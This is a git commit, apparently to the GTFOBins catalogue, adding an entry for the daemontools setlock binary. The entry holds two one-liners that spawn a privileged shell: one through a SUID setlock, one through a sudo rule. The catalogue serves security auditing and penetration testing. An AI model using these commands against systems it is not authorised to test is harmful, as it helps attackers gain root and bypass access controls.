Add setlock

install: apt-get install daemontools
man: https://manpages.ubuntu.com/manpages/trusty/man8/setlock.8.html
This commit is contained in:
Miguel R 2022-12-24 08:28:10 +01:00 committed by GitHub
parent d91f3389af
commit fc372cb4f2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

7
_gtfobins/setlock.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
suid:
- code: ./setlock - /bin/sh -p
sudo:
- code: sudo setlock - /bin/sh
---